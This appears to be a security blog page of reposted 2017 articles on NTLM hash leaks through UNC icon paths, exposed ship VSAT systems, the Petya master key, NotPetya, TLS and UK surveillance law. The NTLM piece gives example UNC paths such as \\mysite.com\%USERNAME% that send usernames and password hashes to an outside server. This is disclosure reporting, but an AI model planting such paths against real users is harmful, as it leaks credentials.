Skip to content

NTLM Hash Leaks: Microsoft’s Ancient Design Flaw

https://dylankatz.com/NTLM-Hashes-Microsoft%27s-Ancient-Design-Flaw/

Your password hash has been leaking for 20 years

In March, I began experimenting with a technique used by Thinkst’s Canarytokens, which allowed them to ping a server when a folder was opened. Basically, they used a desktop.ini file to set the folder icon to an external network share. For instance, they would set the icon of the folder to \\ourwebsite.com\Something\icon.ico, and respond when that URL was pinged.

Discovery #1

After toying with this for a while, I noticed that environment variables could be used within these URLS, thus allowing for an information leak. When setting the URL to \\mysite.com\%USERNAME%, I was able to extract the current username from the system. Additionally, I was able to extract any variable, such as %PATH% or %JAVA_HOME%.

Discovery #2

Unfortunately, this still required the user to open a folder to leak information. It wasn’t enough in my mind to be dangerous. So, after a lot of experimentation, I was also able to get this exploit to work via the icons of .lnk files, allowing it to be exploited via flash drives. At this point, I felt it was worthwhile to report this to Microsoft. While unfortunate, Microsoft did not feel this leaked enough information to be relevant. It wasn’t until several weeks later that I reopened the conversation.

Discovery #3

While browsing Reddit, as I so often do, I stumbled upon an interesting post with a familiar theme. This post by Bosko Stankovic, introduced me to the wonders of NTLM hashes. Not only does the rendering of a filesystem icon cause a hashed version of the user’s password to be sent over the network, but the rendering of ANY image using the\\ UNC prefix will do this. This brings us to the meat of the problem. After researching this further, I realized that this bug was first reported to Microsoft in 1997, making it older than I am. Microsoft has intentionally left this unfixed due to the structural changes it would require. Keep in mind this bug was originally introduced for WinNT/Win95. I can’t see how this wasn’t included during the massive restructuring that seems to occur during the countless major version updates since then.

Microsoft’s Stance/Recommendations

It took Microsoft a long time to respond to this issue. It wasn’t until 2009, roughly 12 years after this exploit was initially reported, that they decided to implement a workaround. Enter NTLM Blocking. Microsoft made it veryclear that they strongly recommended against disabling NTLM due to incompatibility issues. Instead, they created a system called NTLM Blocking, which requires users to edit their Windows security policies, track event logs, and whitelist applications that need access. This system, while effective if used correctly, is very complicated for normal users to configure and difficult to understand.

It’s not all terrible

Thankfully for Windows users, ISPs are defending them where their OS has failed to with a rather nuclear option. Microsoft maintains a list of ISPs that block port 445. This, combined with the fact that some modems will block outbound traffic on port 445, has prevented this issue from being as widely exploitable over the internet. However, even when this attack is blocked over the internet, it is very rarely blocked over LAN, meaning it could be used as a method of pivoting within networks. This issue highlights a serious problem with Microsoft’s inability to restructure core systems within Windows.

The fact that simply opening an email or a webpage can cause you or your organization to be compromised, even on a fully patched system, should be the a priority fix for Microsoft, but sadly it seems they are too big to move efficiently on this front. I was told that a refactor of NTLM handling had been ongoing internally for some time by the case manager, however I’ve seen nothing to verify this is true.

Welp, even ships are hackable now

Large shipping vessels and aircraft are often equipped with VSAT systems, allowing crewmembers to send and receive messages and access the Internet during voyages. Turns out, some of these VSAT systems are profoundly insecure, and could allow an attacker to gain access, and disrupt communications.

Security researcher x0rz discovered that many VSAT systems can be reached from the public Internet. Not only does this mean they can be tracked through services like Shodan, but some are configured in a way that could see a remote attacker gain access using default credentials.

 

Duuuuuude, default creds everywhere. I’m connected to a motherfucking ship as admin right now. Hacking ships is easy 😏 pic.twitter.com/UmLPIveTah

— x0rz (@x0rz) July 18, 2017

 

TNW spoke to the x0rz over the messaging app, Signal. At the start of the interview, he wrote “no ships were harmed during [his] experiments.” However, anyone with less scruples could have caused significant harm. The system they obtained access to allowed them to review the call history from the VSAT phone, change the system settings, and even upload new firmware.

 

They also noted that the VSAT system “might be connected to other onboard devices — maybe more critical,” noting that theoretically, you could exploit a VSAT system to get inside a network, in order to cause more damage.

Because these systems are publicly accessible, it’s possible to figure out where ships are to a troubling precision. During the interview, x0rz gave me the latitude and longitude of a vessel which he insisted was Russian in origin, due to the language used in the system, and its IP address. John Matherly, founder of Shodan, has also created a map where you can track vessels in real-time.

x0rz has only identified a few vulnerable VSAT. These are all from the British manufacturer Cobham (although they note that other systems may ship with the same flaw), and are configured to expose HTTP web services to the Internet. Others exposed SNMP or UDP only.

As pointed out by x0rz, VSAT systems are also popular on aircraft, ranging from small private jets, to military and passenger aircraft.

While it’s theoretically possible that there’s an aircraft equipped with an insecure VSAT system, x0rz noted that they hadn’t found any.

According to Thane & Thane, a Danish shipping company, the VSAT system is used to calibrate instruments. Any disruption could have disastrous consequences.

 

Reference:

https://thenextweb.com/insider/2017/07/18/welp-even-ships-are-hackable-now/

Can anyone become a programmer?

Just as few can become a full time rock star, only a small number of Computing students will become a full time programmer, in fact between 30% and 60% will fail the first programming module.  However, a student could be mediocre at programming, yet strong in Networking.   This is similar to comparing an opera singer to a pop singer, they’re both singers, but with totally different characteristics, and both can make a living.

There are two discrete categories of students within computer science,  those who find programming easy and those who find it virtually impossible.  This issue is global, not just an issue for the UK.  Success in programming cannot be predicted by sex or age.  I find the research on programming to be both petrifying and electrifying, and there is no answer to the puzzle.

What can I add to the research regarding programming?  The first programming language that I was “taught” was Java.  It was an abysmal failure.  The college had to lower the pass mark from 40% to 37% as so many students had failed.  I have since learnt that Java is probably one of the worst languages to teach a novice.  I wholeheartedly agree with that research finding, as I have experienced it first hand.

Secondly at University, I noticed a mutually exclusive set of Computing students. Those graduates who were great at programming, generally struggled with networking.  Those who excelled at Networking, did not “get” programming.

Issues with programming:

  1. Working visual blueprints of programming concepts.  A student needs appropriate mental models of what is happening within a program.  For the majority,  these blueprints do not yet exist.   This lack of “seeing” what the program does, means many children will not predict what the output would be. If they cannot visualise  what needs to happen, they cannot code it.
  2. Decomposition.   We could argue that decomposition or creating mini steps, is the first skill that needs to be taught.  If we find students who can easily decompose an action into steps, this is a positive indicator of success.
  3. Language.  A step forward is to teach Python not Java as a first language, but this is not the solution.  Even with Python, high failure rates predominate.
  4. Cognitive Conflict.  Many students suffer cognitive conflict, as coding is not a skill that everyone can acquire.  If you’re tone deaf, no amount of singing, will make you a pop star.  Try explaining that concept to the policy makers.
  5. Its estimated that half of novices build a mental map of the program, the other half do not.  Those novices with a mental map score around 84%, those without, average 48%.
  6. A programming background is not a positive indicator of success – those who have read Classics could as easily succeed in coding.

The hidden factor within this story,  is that the numbers studying Computer Science at University has halved, at a time when we need to double the number of graduates.  So promoting a subject with high failure rates, to children needs careful consideration.

However, as politicians have a profound lack of understanding for technology, the argument will fall on deaf ears…. (see what I did there).

 

Reference:

https://arstechnica.com/information-technology/2012/09/is-it-true-that-not-everyone-can-be-a-programmer/

http://www.eis.mdx.ac.uk/research/PhDArea/saeed/paper1.pdf

http://www.eis.mdx.ac.uk/research/PhDArea/saeed/

Life is about to get harder for websites without https

In case you haven’t noticed, we’re on a rapid march towards a “secure by default” web when it comes to protecting traffic. For example, back in Feb this year, 20% of the Alexa Top 1 Million sites were forcing the secure scheme:

HTTPS at 20%

These figures are from Scott Helme’s biannual report and we’re looking at a 5-month-old number here. I had a quiet chat with him while writing this piece and apparently that number is now at 28% of the Top 1 Million. Even more impressive is the rate at which it’s changing – the chart above shows that it’s up 45% in only 6 months!

Perhaps even more impressive again is the near 60% of web requests Mozilla is seeing that are sent securely:

Percentage of Web Pages Loaded by Firefox Using HTTPS

Now that’s inevitably a lot of requests centred around the big players on the web who are doing HTTPS ubiquitously (think Gmail, Facebook, Twitter), but the trend is clear – HTTPS is being adopted at a fierce rate. Back in Jan I wrote about how we’d already reached the tipping point, in part because of browser measures like this:

The “shaming” of websites serving login or payment forms insecurely began with Chrome in January then Firefox shortly afterwards (occasionally with rather humorous consequences). And it worked too – soon after that tweet, Qantas did indeed properly secure their site. The indignity of visitors being told that a site is insecure inevitably helps force the hand of the site operator and HTTPS follows.

But per the title of this post, life is about to get a whole lot harder for sites that aren’t already doing HTTPS across the board. Here’s what you’re going to see in only a few months’ time:

Let’s dissect what’s going on here: at the time of writing, we’re at Chrome 59 which behaves the same as Chrome 58 in the image above so non-secure sites have no visual indicator suggesting this (at least not unless they contain a login or payment form). However, once we hit version 62 all websites with form fields served over HTTP will show a “Not secure” warning to the user. Think about what that means – for example, this site will start to show a warning:

 

Reference

https://www.troyhunt.com/life-is-about-to-get-harder-for-websites-without-https/

Master Decrypt Key for Petya Ransomware released by creator

The master key for the original version of the Petya ransomware has been released by its creator, allowing Petya-infected victims to recover their encrypted files without paying any ransom money.

But wait, Petya is not NotPetya.

Do not confuse Petya ransomware with the latest destructive NotPetya ransomware (also known as ExPetr and Eternal Petya) attacks that wreaked havoc across the world last month, massively targeting multiple entities in Ukraine and parts of Europe.

The Petya ransomware has three variants that have infected many systems around the world, but now the author of the original malware, goes by the pseudonym Janus, made the master key available on Wednesday.

According to the security researchers, victims infected with previous variants of Petya ransomware, including Red Petya (first version) and Green Petya (second version) and early versions the GoldenEye ransomware can get their encrypted files back using the master key.

The authenticity of the master key has been verified by an independent Polish information security researcher known as Hasherezade.

“Similarly to the authors of TeslaCrypt, he released his private key, allowing all the victims of the previous Petya attacks, to get their files back,” Hasherezade posted her finding on MalwareBytes on Thursday.

“Thanks to the currently published master key, all the people who have preserved the images of the disks encrypted by the relevant versions of Petya, may get a chance of getting their data back.”

Although the first and second version of Petya was cracked last year, the private key released by Janus offers the fastest and most reliable way yet for Petya-infected victims to decrypt their files, especially locked with the uncrackable third version.

Meanwhile, Kaspersky Lab research analyst Anton Ivanov also analyzed the Janus’ master key and confirmed that the key unlocks all versions of Petya ransomware, including GoldenEye.

Janus created the GoldenEye ransomware in 2016 and sold the variants as a Ransomware-as-a-Service (RaaS) to other hackers, allowing anyone to launch ransomware attacks with just one click and encrypt systems and demand a ransom to unlock it.

If the victim pays, Janus gets a cut of the payment. But in December, he went silent.

However, according to the Petya author, his malware has been modified by another threat actor to create NotPetya that targeted computers of critical infrastructure and corporations in Ukraine as well as 64 other countries.

The NotPetya ransomware also makes use of the NSA’s leaked Windows hacking exploit EternalBlueand EternalRomance to rapidly spread within a network, and WMIC and PSEXEC tools to remotely execute malware on the machines.

Security experts even believe the real intention behind the recent ransomware outcry, which was believed to be bigger than the WannaCry ransomware, was to cause disruption, rather than just another ransomware attack.

According to researchers, NotPetya is in reality wiper malware that wipes systems outright, destroying all records from the targeted systems, and asking for ransom was just to divert world’s attention from a state-sponsored attack to a malware outbreak.

Lucky are not those infected with NotPetya, but the master key can help people who were attacked by previous variants of Petya and Goldeneye ransomware in the past.

Security researchers are using the key to build free decryptors for victims who still have crypto-locked hard drives.

Reference:

https://thehackernews.com/2017/07/petya-ransomware-decryption-key.html

New attack can now decrypt satellite phone calls in “real time”

Chinese researchers have discovered a way to rapidly decrypt satellite phone communications — within a fraction of a second in some cases.

The paper, published this week, expands on previous research by German academics in 2012 by rapidly speeding up the attack and showing that the encryption used in popular Inmarsat satellite phones can be cracked in “real time.”

 

Satellite phones are used by those in desolate environments, including high altitudes and at sea, where traditional cell service isn’t available. Modern satellite phones encrypt voice traffic to prevent eavesdropping. It’s that modern GMR-2 algorithm that was the focus of the research, given that it’s used in most satellite phones today.

The researchers tried “to reverse the encryption procedure to deduce the encryption-key from the output keystream directly,” rather than using the German researchers’ method of recovering an encryption key using a known-plaintext attack.

Using their proposed inversion attack thousands of time on a 3.3GHz satellite stream, the researchers were able to reduce the search space for the 64-bit encryption key, effectively making the decryption key easier to find.

The end result was that encrypted data could be cracked in a fraction of a second.

 

“This again demonstrates that there exists serious security flaws in the GMR-2 cipher, and it is crucial for service providers to upgrade the cryptographic modules of the system in order to provide confidential communication,” said the researchers.

An Inmarsat spokesperson said Thursday that the company “immediately took action to address the potential security issue and this was fully addressed” in 2012. “We are entirely confident that the issue… has been completely resolved and that our satellite phones are secure,” the spokesperson said.

Matthew Green, a cryptography teacher at Johns Hopkins University, blogged about the German read-collision based technique in 2012. “Satellite telephone security matters,” he said at the time. “In many underdeveloped rural areas, it’s the primary means of communicating with the outside world. Satphone coverage is also important in war zones, where signal privacy is of more than academic interest,” he added.

 

Reference:

http://www.zdnet.com/article/encryption-satellite-phones-unscramble-attack-research/

TLS security: Past, present and future

https://www.helpnetsecurity.com/2017/07/03/tls-security/

The Transport Layer Security (TLS) protocol as it stands today has evolved from the Secure Sockets Layer (SSL) protocol from Netscape Communications and the Private Communication Technology (PCT) protocol from Microsoft that were developed in the 1990s, mainly to secure credit card transactions over the Internet.

It soon became clear that a unified standard was required, and an IETF TLS WG was tasked. As a result, TLS 1.0 was specified in 1999, TLS 1.1 in 2006, TLS 1.2 in 2008, and TLS 1.3 will hopefully be released soon. Each protocol version tried to improve its predecessor and mitigated some specific attacks.

 

As is usually the case in security, there is a “cops and robbers” game going between the designers and developers of the TLS protocol and the people who try to break it (be it from the hacker community or from academia). Unfortunately, this game is open-ended, meaning that it will never end and has no winner.

Since the early days of the SSL/TLS protocols, the security community has been struggling with various attacks that have made many press headlines. Examples include protocol-level attacks, like BEAST, CRIME, TIME, BREACH, Lucky 13, POODLE, FREAK, Logjam, DROWN, SLOTH, Sweet32, and the triple handshake attack, as well as pure implementation bugs, like Apple’s “goto fail” and Heartbleed.

In the evolution of the SSL/TLS protocols, all of these attacks and incidents were considered. For example, the weaknesses and vulnerabilities that enabled attacks like BEAST, POODLE, and Lucky 13, led to TLS 1.1. All remaining weaknesses and vulnerabilities have been taken into account in the specification of TLS 1.3 (the protocol version may still change, because the protocol changes are fundamental and substantial).

From a security perspective, TLS 1.3 is a major breakthrough and tries to get rid of all cryptographic techniques and primitives that is known to be weak and exploitable. For example, ciphers are only allowed in TLS 1.3, if they provide authenticated encryption with additional data (AEAD). Most importantly, this disallows all block ciphers operated in cipherblock chaining (CBC) mode that has been the source of many attacks in the past. It also disallows the formerly used technique to first authenticate data (by generating a message authentication code) and then encrypting it. Instead, both operations must be invoked simultaneously.

TLS 1.3 also disallows cryptographic algorithms that are known to be weak, such as stream ciphers like RC4, hash functions like MD5 or SHA-1, and block ciphers like 3DES, as well as all types of export-grade cryptography. Due to attacks like CRIME, TIME, and BREACH, we know today that the secure combination of compression and encryption is tricky, and TLS 1.3 therefore abandons TLS-level compression entirely. Finally, TLS 1.3 is highly efficient and can therefore get rid of session resumption and renegotiation. These shortcut features have led to distinct attacks in the past, i.e., session renegotiation and triple handshake attacks.

 

The bottom line is that TLS 1.3 represents the state-of-the-art in cryptographic research. Does this mean that the series of attacks, countermeasures, and counterattacks will eventually come to an end, and that we are going to see a stable situation in terms of security? Probably not. Once again, the problem is in the difference between theory and practice. To put it into the words of Albert Einstein: “In theory, theory and practice are the same. In practice, they are not.” This quote is true, and it is certainly also true for TLS 1.3. In theory, TLS 1.3 is secure, but in practice, we don’t know.

There are at least two uncertainties: First, we don’t know how well the protocol is going to be implemented (keep in mind that in any nontrivial security protocol, implementation bugs are likely to occur). Second, the implementations of the protocol need to be configured and used in proper ways (keep in mind that security breaches often occur, because security products are misconfigured or misused).

This is similar to the real world: If we have a security system in place (e.g., a burglar alarm system), we can still misconfigure it or use it in a way that is inappropriate and makes its security obsolete.

Security is and remains to be a tricky and multifaceted business. There are many things that can go wrong. A mathematician would say that having secure technologies in place is a necessary but not sufficient condition to achieve security.

Many complementary things must be in place so that a technology can unfold its real power. This also applies to TLS security in general, and TLS 1.3 in particular. The most important example to mention here is a proper way to manage public key certificates on a global scale. This is still one of the Achilles heels in properly using TLS. You may stay tuned: The “cops and robbers” game is likely to continue and you may even participate in this challenging game.

 

What A Global Anti-Encryption Regime Could Look Like – UK

Our Prime Minister wrote  the dangerous RIPA law,  and this year, to my horror, she persists in attempting to end widespread encryption.  I’m concerned that these laws are open to abuse by hundreds of government departments, in addition to everyday financial crimes. In truth, I am more worried by government abuse than any crimes that may be committed by criminals.

https://www.eff.org/deeplinks/2017/06/five-eyes-unlimited

Before she was elevated to the role of Prime Minister by the fallout from Brexit, Theresa May was the author of the UK’s Investigatory Powers bill, which spelled out the UK’s plans for mass surveillance in a post-Snowden world.

At the unveiling of the bill in 2015, May’s officials performed the traditional dance: they stated that they would be looking at controls on encryption, and then stating definitively that their new proposals included “no backdoors”.

Sure enough, the word “encryption” does not appear in the Investigatory Powers Act (IPA). That’s because it is written so broadly it doesn’t need to.

We’ve covered the IPA before at EFF, but it’s worth re-emphasizing some of the powers it grants the British government.

  • Any “communications service provider” can be served with a secret warrant, signed by the Home Secretary. Communications service provider is interpreted extremely broadly to include ISPs, social media platforms, mail services and other messaging services.
  • That warrant can describe a set of people or organizations that the government wants to spy upon.
  • It can require tech companies to insert malware onto their users’ computers, re-engineer their own technology, or use their networks to interfere with any other system.
  • The warrant explicitly allows those companies to violate any other laws in complying with the warrant.
  • Beyond particular warrants, private tech companies operating in the United Kingdom also have to respond to “technical capability notices” which will require them to “To provide and maintain the capability to disclose, where practicable, the content of communications or secondary data in an intelligible form,” as well as permit targeted and mass surveillance and government hacking.
  • Tech companies also have to the provide the UK government with new product designs in advance, so that the government can have time to require new “technical capabilities” before they are available to customers.

These capabilities alone already go far beyond the Nineties’ dreams of a blanket ban on crypto. Under the IPA, the UK claims the theoretical ability to order a company like Apple or Facebook to remove secure communication features from their products—while being simultaneously prohibited from telling the public about it.

Companies could be prohibited from fixing existing vulnerabilities, or required to introduce new ones in forthcoming products. Even incidental users of communication tech could be commandeered to become spies in her Majesty’s Secret Service: those same powers also allow the UK to, say, instruct a chain of coffee shops to use its free WiFi service to deploy British malware on its customers. (And, yes, coffee shops are given by officials as a valid example of a “communications service provider.”)

Wouldn’t companies push back against such demands? Possibly: but it’s a much harder fight to win if it’s not just the UK making the demand, but an international coalition of governments putting pressure on them to obey the same powers. This, it seems is what May’s government wants next.

The Lowest Common Privacy Denominator

Since the IPA passed, May has repeatedly declared her intent to create a an international agreement on “regulating cyberspace”. The difficulty of enforcing many of the theoretical powers of the IPA makes this particularly pressing.

The IPA includes language that makes it clear that the UK expects foreign companies to comply with its secret warrants. Realistically, it’s far harder for UK law enforcement to get non-UK technology companies to act as their personal hacking teams. That’s one reason why May’s government has talked up the IPA as a “global gold standard” for surveillance, and one that they hope other countries will adopt.

 

 

Cyber attack hits CHERNOBYL radiation system: ‘Goldeneye’ ransomware strikes

http://www.dailymail.co.uk/news/article-4643752/Europe-hit-new-WannaCry-virus.html

Chernobyl’s radiation monitoring system has been hit by the attack with its sensors shut down while UK advertising giant WPP, the largest agency in the world, among dozens of firms affected.

The ransomware appears to have been spread through popular accounting software and specifically targeted at bringing down business IT systems.

The outage began in Ukraine as the country’s power grid, airport, national bank and communications firms were first to report problems, before it spread rapidly throughout Europe.

Companies in the US, Germany, Norway, Russia, Denmark and France are among those to have confirmed issues so far

 Users are being shown a message saying their data has been encrypted, with some asking for £300 in anonymous currency Bitcoin to retrieve it (pictured, an ATM in Ukraine)

More than 200,000 victims in 150 countries were infected by that software, which originated in the UK and Spain last month, before spreading globally.

But cyber security experts have warned that this time the virus is much more dangerous because it has no ‘kill switch’ and is designed to spread rapidly though networks.

Marcus Hutchins, who foiled the previous WannaCry attack by discovering a way to stop it from infecting new computers, told MailOnline that even if users pay the fee their files could now be lost forever.

He said: ‘The company that hosts the email account which the ransomware asks you to contact has closed the account. There’s no way to get files back.

‘It’s early days – we don’t know if we can find a fix yet. But if it’s decryptable we will find a way.’

Hutchins, 22, continued: ‘Everyone’s looking at this right now and I’m working with other researchers.

‘I was just praying it wasn’t the Wannacry exploit again. Ideally we’ll have to find a way to decrypt the files or else people are not going to get them back.’

The ransomware targets computers using the Windows XP operating system which have not installed the latest security updates released by Microsoft.

KALI Linux – Promiscous Mode – Wireless hacking

 

Six Modes of Wireless

  • Monitor
  • Managed
  • Ad hoc
  • Master
  • Managed
  • Mesh
  • Repeater

%d bloggers like this: